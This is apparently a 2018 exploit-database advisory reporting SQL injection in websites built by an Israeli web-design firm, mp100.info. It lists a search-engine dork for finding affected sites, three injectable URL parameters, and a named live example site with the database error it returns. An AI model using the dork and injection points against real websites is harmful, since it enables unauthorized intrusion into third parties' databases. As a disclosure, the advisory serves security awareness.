Israel Mp100.info Systems Web Design SQL Injection Vulnerability

2018.06.02

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:''mp100 systems - בניית אתרים''

#################################################################################################
# Exploit Title : Israel Mp100.info Systems Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 02/06/2018
# Vendor Homepage : mp100.info
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
# Google Dork : intext:''mp100 systems - בניית אתרים''
# Exploit : /news.asp?id=[SQL Injection]
# Exploit : /content_id.asp?id=[SQL Injection]
# Exploit : /gallery_id.asp?id=[SQL Injection]
#################################################################################################
# Example Site => greennow.org.il/news.asp?id=239%27 [ Proof of Concept for SQL Inj ] => archive.is/Oak5U
# SQL-DB Error =>
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'CInt'
/news.asp, line 8
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Israel Mp100.info Systems Web Design SQL Injection Vulnerability

Dork: intext:''mp100 systems - בניית אתרים''

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.